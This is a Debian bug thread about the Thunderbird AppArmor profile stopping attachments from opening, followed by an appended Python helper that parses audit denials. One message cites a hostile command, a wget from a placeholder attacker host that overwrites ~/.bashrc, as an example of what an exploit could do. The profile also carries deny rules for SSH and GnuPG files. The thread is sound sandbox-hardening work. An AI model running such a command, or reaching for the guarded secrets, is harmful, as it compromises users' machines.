Bug#855346: thunderbird: Can't open attachments with AppArmor profile enforced
Control: tag -1 + fixed-upstream

Thanks to Vincas this was fixed upstream:
https://git.launchpad.net/apparmor-profiles/tree/ubuntu/17.10/usr.bin.thunderbird

Carsten, could you please pull this updated profile?

Cheers,
--
intrigeri
Bug#855346: thunderbird: Can't open attachments with AppArmor profile enforced
On 2017.10.25 22:25, Simon Deziel wrote:
>> Strange, preliminary test shows that totem is launched with its
>> profile, meanwhile evince is launched via thunderbird//sanitized_helper
>> for unknown reason. I need to test some more.
>
> It's been that way for a long time, see [1].
>
> Regards,
> Simon
>
> [1] https://bugs.launchpad.net/ubuntu/+source/apparmor/+bug/1042771

Thanks for the info. Not sure why it's Low priority, if it renders
abstractions (ubuntu-{browsers,..}) that use sanitized_helper
kinda-almost-useless?
Bug#855346: thunderbird: Can't open attachments with AppArmor profile enforced
On 2017-10-25 03:08 PM, Vincas Dargis wrote:
> On 2017.10.25 10:26, intrigeri wrote:
>>> Also, if sanitized_helper contains:
>>
>>> `/{usr/,}bin/* Pixr,`
>>
>>> Doesn't this automatically mean that this line in usr.bin.thunderbird
>>> profile
>>
>>> `/{usr/,}bin/* Cx -> sanitized_helper,`
>>
>>> will in result launch /usr/bin/totem with its *P*rofile?
>>
>>> I wonder, because `abstractions/ubuntu-media-players has
>>> `/usr/bin/totem Cxr -> sanitized_helper,`, maybe that would work?
>>> I'll do some testing tomorrow.
>>
>> Indeed, it might be that the specific rules about evince & totem
>> you're quoting from my patch above are not needed. It would be nice if
>> we could drop them (and the maintenance cost of hard-coding a list of
>> exceptions) so I'm hoping your testing confirms your hypothesis :)
>
> Strange, preliminary test shows that totem is launched with its
> profile, meanwhile evince is launched via thunderbird//sanitized_helper
> for unknown reason. I need to test some more.

It's been that way for a long time, see [1].

Regards,
Simon

[1] https://bugs.launchpad.net/ubuntu/+source/apparmor/+bug/1042771
Bug#855346: thunderbird: Can't open attachments with AppArmor profile enforced
On 2017.10.25 10:26, intrigeri wrote:
>> Also, if sanitized_helper contains:
>> `/{usr/,}bin/* Pixr,`
>> Doesn't this automatically mean that this line in usr.bin.thunderbird
>> profile `/{usr/,}bin/* Cx -> sanitized_helper,` will in result launch
>> /usr/bin/totem with its *P*rofile?
>> I wonder, because `abstractions/ubuntu-media-players has
>> `/usr/bin/totem Cxr -> sanitized_helper,`, maybe that would work?
>> I'll do some testing tomorrow.
>
> Indeed, it might be that the specific rules about evince & totem
> you're quoting from my patch above are not needed. It would be nice if
> we could drop them (and the maintenance cost of hard-coding a list of
> exceptions) so I'm hoping your testing confirms your hypothesis :)

Strange, preliminary test shows that totem is launched with its profile,
meanwhile evince is launched via thunderbird//sanitized_helper for
unknown reason. I need to test some more.

And totem does not even show its GUI in new fresh Debian Sid GNOME.
Maybe it needs patches you are proposing upstream.
Bug#855346: thunderbird: Can't open attachments with AppArmor profile enforced
Vincas Dargis:
> On 2017.10.25 10:26, intrigeri wrote:
>> Indeed, it might be that the specific rules about evince & totem
>> you're quoting from my patch above are not needed. It would be nice if
>> we could drop them (and the maintenance cost of hard-coding a list of
>> exceptions) so I'm hoping your testing confirms your hypothesis :)
> Yes I am going to test multiple format attachments just now.

Amazing! :)

> Personally, I would like to have bunch of abstractions to contain
> all image, document viewers, editors and what not, […]

I'm not looking forward to maintaining these abstractions.

> With pending patch, some Thunderbird exploit needs just execute
> `wget -O ~/.bashrc http://cracr.io:1337/own` and it's end game.

Right. Sadly, the other currently available option is what we have now:
breaking critical stuff in a way that encourages people to fully disable
AppArmor and open a bunch of other holes in their system (by disabling
all confinement for all other apps). This is exactly what I've been
trying to avoid in the last years while working on AppArmor in Debian,
and I'm sad we're shipping an AppArmor profile that breaks basic
functionality here.

> But let's fix this critical broken stuff and do the right way later.

ACK, glad we're on the same page :)

[Now, if we want to talk about the right way, I doubt it'll be with
AppArmor: Flatpak and friends finally tackle the problems AppArmor can't
solve for GUI apps.]

Cheers,
--
intrigeri
Bug#855346: thunderbird: Can't open attachments with AppArmor profile enforced
On 2017.10.25 10:26, intrigeri wrote:
> Indeed, it might be that the specific rules about evince & totem
> you're quoting from my patch above are not needed. It would be nice if
> we could drop them (and the maintenance cost of hard-coding a list of
> exceptions) so I'm hoping your testing confirms your hypothesis :)

Yes I am going to test multiple format attachments just now.

>> If there's extra rules for XFCE, maybe I should try Thunderbird on
>> several DE.
>
> This would be sweet but right now the thing is totally broken, so
> fixing them on the default DE (GNOME) only would be a huge improvement
> already. I suggest you focus on getting this done first, and later we
> can test (or call for testing!) on other DEs. There's no way we can
> test all relevant configurations, so we'll need to rely on user
> testing to some degree anyway.

OK if we call this urgent, we do as such.

Personally, I would like to have bunch of abstractions to contain all
image, document viewers, editors and what not, so that browsers, email
clients and IM's could include them (or one big proxy-policy file that
includes all these grouped -browsers -editors -viewers) and so have
more restrictive policy.

With pending patch, some Thunderbird exploit needs just execute
`wget -O ~/.bashrc http://cracr.io:1337/own` and it's end game.

But let's fix this critical broken stuff and do the right way later.
Bug#855346: thunderbird: Can't open attachments with AppArmor profile enforced
Hi Vincas,

Vincas Dargis:
> + # Allow opening attachments
> + /{usr/,}bin/* Cx -> sanitized_helper,
> + /{usr/,}sbin/* Cx -> sanitized_helper,
> + /usr/local/{bin,sbin}/* Cx -> sanitized_helper,
> + /usr/bin/evince Pix,
> + /usr/bin/totem Pix,
[...]
> Do we really need sbin? I kind of doubt there will be "document viewers",
> and it has setuid applications like pppd and exim4, which is not
> comforting.

Good catch! Makes sense to me, feel free to drop the sbin bits as long
as it does not obviously break stuff in your tests :)

> Also, if sanitized_helper contains:
> `/{usr/,}bin/* Pixr,`
> Doesn't this automatically mean that this line in usr.bin.thunderbird
> profile
> `/{usr/,}bin/* Cx -> sanitized_helper,`
> will in result launch /usr/bin/totem with its *P*rofile?
> I wonder, because `abstractions/ubuntu-media-players has
> `/usr/bin/totem Cxr -> sanitized_helper,`, maybe that would work?
> I'll do some testing tomorrow.

Indeed, it might be that the specific rules about evince & totem
you're quoting from my patch above are not needed. It would be nice if
we could drop them (and the maintenance cost of hard-coding a list of
exceptions) so I'm hoping your testing confirms your hypothesis :)

> If there's extra rules for XFCE, maybe I should try Thunderbird on
> several DE.

This would be sweet but right now the thing is totally broken, so
fixing them on the default DE (GNOME) only would be a huge improvement
already. I suggest you focus on getting this done first, and later we
can test (or call for testing!) on other DEs. There's no way we can
test all relevant configurations, so we'll need to rely on user
testing to some degree anyway.

Cheers,
--
intrigeri
Bug#855346: thunderbird: Can't open attachments with AppArmor profile enforced
Patch snippet:

+ # Allow opening attachments
+ /{usr/,}bin/* Cx -> sanitized_helper,
+ /{usr/,}sbin/* Cx -> sanitized_helper,
+ /usr/local/{bin,sbin}/* Cx -> sanitized_helper,
+ /usr/lib/libreoffice/program/soffice Cxr -> sanitized_helper,
+ /usr/bin/evince Pix,
+ /usr/bin/totem Pix,

Do we really need sbin? I kind of doubt there will be "document viewers",
and it has setuid applications like pppd and exim4, which is not
comforting.

Also, if sanitized_helper contains:
`/{usr/,}bin/* Pixr,`
Doesn't this automatically mean that this line in usr.bin.thunderbird
profile
`/{usr/,}bin/* Cx -> sanitized_helper,`
will in result launch /usr/bin/totem with its *P*rofile?

I wonder, because `abstractions/ubuntu-media-players has
`/usr/bin/totem Cxr -> sanitized_helper,`, maybe that would work?
I'll do some testing tomorrow.

If there's extra rules for XFCE, maybe I should try Thunderbird on
several DE.
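Review bot: the `/{usr/,}sbin/* Cx -> sanitized_helper,` line in the snippet lets Thunderbird spawn every binary under sbin, and as the message itself points out that directory holds setuid programs such as pppd and exim4 that no attachment handler needs; drop that line unless a concrete viewer is found to live there. The `/usr/bin/evince Pix,` and `/usr/bin/totem Pix,` lines overlap the `/{usr/,}bin/* Cx -> sanitized_helper,` glob for the same two paths; if sanitized_helper's own `/{usr/,}bin/* Pixr,` already hands those viewers to their own profiles, the two explicit Pix lines are redundant and should go once testing confirms it, so the profile does not hard-code a list of exceptions that has to be maintained separately.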
Bug#855346: thunderbird: Can't open attachments with AppArmor profile enforced
Hello Mike,

could you please add intrigeri to the pkg-mozilla group on Alioth? Seems
to me this hasn't happened since intrigeri requested access. Adding him
to pkg-mozilla is helping Thunderbird by the apparmor integration a lot.

Thanks!

On 20.09.2017 at 17:31, intrigeri wrote:
> Carsten Schoenert:
>> On Sun, Sep 03, 2017 at 10:36:23AM +0200, intrigeri wrote:
>>> By the way, IIRC Carsten told me that I could push such fixes directly
>>> to the Vcs-Git. I've just tried to push my branch there, and was told:
> [...]
>> seems you have no access rights though.
> [...]
>> Should be solvable by getting access to the pkg-mozilla group on alioth.
>
> I've just requested access :)

--
Regards
Carsten Schoenert
Bug#855346: thunderbird: Can't open attachments with AppArmor profile enforced
Carsten Schoenert:
> On Sun, Sep 03, 2017 at 10:36:23AM +0200, intrigeri wrote:
>> By the way, IIRC Carsten told me that I could push such fixes directly
>> to the Vcs-Git. I've just tried to push my branch there, and was told:
[...]
> seems you have no access rights though.
[...]
> Should be solvable by getting access to the pkg-mozilla group on alioth.

I've just requested access :)
Bug#855346: thunderbird: Can't open attachments with AppArmor profile enforced
Hello intrigeri,

On Sun, Sep 03, 2017 at 10:36:23AM +0200, intrigeri wrote:
...
> By the way, IIRC Carsten told me that I could push such fixes directly
> to the Vcs-Git. I've just tried to push my branch there, and was told:
>
> remote: error: insufficient permission for adding an object to repository database ./objects
> remote: fatal: failed to write object
> error: remote unpack failed: unpack-objects abnormal exit
> To git+ssh://git.debian.org/git/pkg-mozilla/icedove.git
>  ! [remote rejected] bugfix/874100 -> bugfix/874100 (unpacker error)
> error: failed to push some refs to 'git+ssh://git.debian.org/git/pkg-mozilla/icedove.git'

seems you have no access rights though.

tijuca-guest@moszumanska:/srv/git.debian.org/git/pkg-mozilla$ ls -l icedove.git/
insgesamt 96
drwxrwsr-x+   2 agx           pkg-mozilla  4096 Dez 18  2009 branches
-rw-rwxr--+   1 christi-guest pkg-mozilla   126 Feb  8  2017 config
-rw-rwxr--+   1 agx           pkg-mozilla    25 Dez 18  2009 description
-rw-rwxr--+   1 agx           pkg-mozilla    27 Apr  8 13:50 HEAD
drwxrwsr-x+   2 agx           pkg-mozilla  4096 Dez 18  2009 hooks
drwxrwsr-x+   2 agx           pkg-mozilla  4096 Jun  2  2016 info
drwxrwsr-x+ 258 agx           pkg-mozilla  4096 Aug 12 04:02 objects
-rw-rw-r--+   1 agx           pkg-mozilla 43022 Jun 23 11:11 packed-refs
drwxrwsr-x+   4 agx           pkg-mozilla  4096 Dez 18  2009 refs
tijuca-guest@moszumanska:/srv/git.debian.org/git/pkg-mozilla$ id intrigeri | grep pkg-mozilla
tijuca-guest@moszumanska:/srv/git.debian.org/git/pkg-mozilla$

Should be solvable by getting access to the pkg-mozilla group on alioth.
More to this specific thing on #874100, I'm a bit time constrained for
this right now.

Regards
Carsten
Bug#855346: thunderbird: Can't open attachments with AppArmor profile enforced
Control: tag -1 + patch

Hi,

(sorry for the delay, post-DebConf holiday / traveling + another conference)

Michael Biebl:
> They might want to usertag this bug accordingly

Done with:

  bts user pkg-apparmor-t...@lists.alioth.debian.org \
      . usertag 855346 + help-needed

Feel free to do so yourself next time :)

> Fwiw, I can confirm that opening attachments from TB with AA active is
> currently broken e.g. for PDF files. My PDF viewer is evince.

Indeed. I observe the same problem for OpenPGP keys, PNG images,
Scribus .sla files and ODS spreadsheets: the profile we ship will
forbid opening almost all kinds of attachments, and despite the "Open"
action being advertised in the GUI, one currently has to first save
the attachment and then open it from outside of Thunderbird.

Such a restriction might make sense as long as AppArmor is disabled by
default: users who want extra security hard enough to opt-in might be
ready to live with it… although it's troubling that we advertise a
broken "Open" action in this case. But I don't think it's acceptable
now that we're seriously considering enabling AppArmor by default in
Debian.

The bugfix/855346 branch in the https://git-tails.immerda.ch/icedove.git
repository has a fix based on Ulrike's branch + additional fixes.
Please review & merge :)

I'll forward my proposed change upstream once it's been clarified for
this profile what our upstream actually is:
https://bugs.debian.org/874100

By the way, IIRC Carsten told me that I could push such fixes directly
to the Vcs-Git. I've just tried to push my branch there, and was told:

remote: error: insufficient permission for adding an object to repository database ./objects
remote: fatal: failed to write object
error: remote unpack failed: unpack-objects abnormal exit
To git+ssh://git.debian.org/git/pkg-mozilla/icedove.git
 ! [remote rejected] bugfix/874100 -> bugfix/874100 (unpacker error)
error: failed to push some refs to 'git+ssh://git.debian.org/git/pkg-mozilla/icedove.git'

Cheers,
--
intrigeri
Bug#855346: thunderbird: Can't open attachments with AppArmor profile enforced
Package: thunderbird
Version: 1:45.7.1-1
Severity: normal

The Thunderbird AppArmor profile breaks the ability to open attachments
directly. (Saving them is possible.) For instance, when attempting to
open an attached .png by selecting 'Open with Image Viewer',
/usr/bin/eog fails to launch:

audit: type=1400 audit(1487288200.755:153): apparmor="DENIED" operation="exec" profile="thunderbird" name="/usr/bin/eog" pid=5668 comm="thunderbird" requested_mask="x" denied_mask="x" fsuid=1000 ouid=0

Instead, a file type association prompt is shown, which doesn't do
anything useful. Similar warnings are shown for /usr/bin/evince (.pdf),
/usr/bin/file-roller (.tar.gz) and /usr/lib/libreoffice/program/soffice
(.odt), but for some reason I am able to open .txt files with
/usr/bin/gedit without issues.

-- System Information:
Debian Release: 9.0
  APT prefers testing
  APT policy: (500, 'testing')
Architecture: amd64 (x86_64)

Kernel: Linux 4.9.0-1-amd64 (SMP w/2 CPU cores)
Locale: LANG=nl_NL.UTF-8, LC_CTYPE=nl_NL.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/dash
Init: systemd (via /run/systemd/system)

Versions of packages thunderbird depends on:
ii  debianutils               4.8.1
ii  fontconfig                2.11.0-6.7
ii  libasound2                1.1.3-4
ii  libatk1.0-0               2.22.0-1
ii  libc6                     2.24-9
ii  libcairo2                 1.14.8-1
ii  libdbus-1-3               1.10.14-1
ii  libdbus-glib-1-2          0.108-2
ii  libevent-2.0-5            2.0.21-stable-2.1
ii  libffi6                   3.2.1-6
ii  libfontconfig1            2.11.0-6.7
ii  libfreetype6              2.6.3-3+b1
ii  libgcc1                   1:6.3.0-6
ii  libgdk-pixbuf2.0-0        2.36.4-1
ii  libglib2.0-0              2.50.2-2
ii  libgtk2.0-0               2.24.31-2
ii  libhunspell-1.4-0         1.4.1-2+b1
ii  libicu57                  57.1-5
ii  libnspr4                  2:4.12-6
ii  libnss3                   2:3.26.2-1
ii  libpango-1.0-0            1.40.3-3
ii  libpangocairo-1.0-0       1.40.3-3
ii  libpangoft2-1.0-0         1.40.3-3
ii  libpixman-1-0             0.34.0-1
ii  libsqlite3-0              3.16.2-2
ii  libstartup-notification0  0.12-4
ii  libstdc++6                6.3.0-6
ii  libvpx4                   1.6.1-2
ii  libx11-6                  2:1.6.4-3
ii  libxcomposite1            1:0.4.4-2
ii  libxdamage1               1:1.1.4-2+b1
ii  libxext6                  2:1.3.3-1
ii  libxfixes3                1:5.0.3-1
ii  libxrender1               1:0.9.10-1
ii  libxt6                    1:1.1.5-1
ii  psmisc                    22.21-2.1+b1
ii  zlib1g                    1:1.2.8.dfsg-5

Versions of packages thunderbird recommends:
ii  hunspell-en-us [hunspell-dictionary]  20070829-7
ii  hunspell-nl [hunspell-dictionary]     1:5.2.5-1
pn  lightning

Versions of packages thunderbird suggests:
ii  apparmor          2.11.0-2
pn  fonts-lyx
ii  libgssapi-krb5-2  1.15-1

-- Configuration Files:
/etc/apparmor.d/usr.bin.thunderbird changed:
@{MOZ_LIBDIR}=/usr/lib/thunderbird

profile thunderbird /usr/lib/thunderbird/thunderbird {
  #include
  #include
  #include

  # TODO: finetune this for required accesses
  #include
  #include
  #include
  #include
  #include
  #include
  #include
  #include
  #include
  #include
  #include

  # For Xubuntu to launch the browser
  /usr/bin/exo-open ixr,
  /usr/lib/@{multiarch}/xfce4/exo-1/exo-helper-1 ixr,
  /etc/xdg/xdg-xubuntu/xfce4/helpers.rc r,
  /etc/xdg/xfce4/helpers.rc r,

  # for crash reports?
  ptrace (read,trace) peer=@{profile_name},

  /usr/lib/thunderbird/thunderbird ixr,

  # Pulseaudio
  /usr/bin/pulseaudio Pixr,

  owner @{HOME}/.{cache,config}/dconf/user rw,
  owner /run/user/[0-9]*/dconf/user rw,
  owner @{HOME}/.config/gtk-3.0/bookmarks r,
  deny owner @{HOME}/.local/share/gvfs-metadata/* r,

  # potentially extremely sensitive files
  audit deny @{HOME}/.gnupg/** mrwkl,
  audit deny @{HOME}/.ssh/** mrwkl,

  # rw access to HOME is useful when sending/receiving attachments
  owner @{HOME}/** rw,

  # Required for LVM setups
  /sys/devices/virtual/block/dm-[0-9]*/uevent r,

  # Addons (too lax for thunderbird)
  ##include

  # for networking
  network inet stream,
  network inet6 stream,
  @{PROC}/[0-9]*/net/if_inet6 r,
  @{PROC}/[0-9]*/net/ipv6_route r,
  @{PROC}/[0-9]*/net/dev r,
  @{PROC}/[0-9]*/net/wireless r,

  # should maybe be in abstractions
  /etc/ r,
  /etc/mime.types r,
  /etc/mailcap r,
  /etc/xdg/*buntu/applications/defaults.list r, # for all derivatives
  /etc/xfce4/defaults.list r,
  /usr/share/xubuntu/applications/defaults.list r,
  owner @{HOME}/.local/share/applications/defaults.list r,
  owner @{HOME}/.local/share/applications/mimeapps.list r,
  owner @{HOME}/.local/share/applications/mimeinfo.cache r,
  owner /tmp/** m,
  owner /var/tmp/** m,
  /tmp/.X[0-9]*-lock r,
  /etc/udev/udev.conf r,
  # Doesn't seem to be required, but noisy. Maybe allow 'r' for 'b*' if needed.
  # Possibly move to
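A small diagnostic helper, added here as an example and not code from the bug thread or the Debian packaging: it parses AppArmor `DENIED` audit lines like the one in the report above and reports which exec targets none of the path globs from the patch snippet posted in the thread would cover. The sample log lines (two exec denials, one open denial) are constructed from paths named in the thread; `@{HOME}`-style variables and `[]` character classes are not handled by the glob translation.

```python
import re

# Constructed sample log: the DENIED line quoted in the bug report plus a
# similar exec denial for soffice and one non-exec denial (gnupg) that the
# exec check must ignore.
SAMPLE_AUDIT = """\
audit: type=1400 audit(1487288200.755:153): apparmor="DENIED" operation="exec" profile="thunderbird" name="/usr/bin/eog" pid=5668 comm="thunderbird" requested_mask="x" denied_mask="x" fsuid=1000 ouid=0
audit: type=1400 audit(1487288300.002:155): apparmor="DENIED" operation="exec" profile="thunderbird" name="/usr/lib/libreoffice/program/soffice" pid=5733 comm="thunderbird" requested_mask="x" denied_mask="x" fsuid=1000 ouid=0
audit: type=1400 audit(1487288310.003:156): apparmor="DENIED" operation="open" profile="thunderbird" name="/home/user/.gnupg/pubring.kbx" pid=5733 comm="thunderbird" requested_mask="r" denied_mask="r" fsuid=1000 ouid=0
"""

# Path parts of the exec rules in the patch snippet posted in the thread.
PATCH_EXEC_RULES = ["/{usr/,}bin/*", "/{usr/,}sbin/*", "/usr/local/{bin,sbin}/*",
                    "/usr/lib/libreoffice/program/soffice", "/usr/bin/evince",
                    "/usr/bin/totem"]

FIELD_RE = re.compile(r'(\w+)="([^"]*)"')

def parse_denials(audit_text):
    """Yield (profile, operation, path) for each apparmor="DENIED" line."""
    for line in audit_text.splitlines():
        if 'apparmor="DENIED"' not in line:
            continue
        f = dict(FIELD_RE.findall(line))
        yield f.get("profile"), f.get("operation"), f.get("name")

def glob_to_regex(pattern):
    """AppArmor path glob -> regex: '**' spans '/', '*' and '?' do not,
    '{a,b}' is alternation. Variables (@{HOME}) and [] classes are not handled."""
    out, depth, i = [], 0, 0
    while i < len(pattern):
        c = pattern[i]
        if pattern.startswith("**", i):
            out.append(".*"); i += 2; continue
        if c == "*":
            out.append("[^/]*")
        elif c == "?":
            out.append("[^/]")
        elif c == "{":
            out.append("(?:"); depth += 1
        elif c == "}" and depth:
            out.append(")"); depth -= 1
        elif c == "," and depth:
            out.append("|")
        else:
            out.append(re.escape(c))
        i += 1
    return re.compile("^" + "".join(out) + "$")

def uncovered_exec_denials(audit_text, rules, profile="thunderbird"):
    """Exec targets denied under `profile` that none of `rules` would match."""
    regexes = [glob_to_regex(r) for r in rules]
    return [path for prof, op, path in parse_denials(audit_text)
            if prof == profile and op == "exec"
            and not any(rx.match(path) for rx in regexes)]
```

With only the `/{usr/,}bin/*` rule, `uncovered_exec_denials` still lists soffice, which is why the snippet carries a separate `/usr/lib/libreoffice/program/soffice` line.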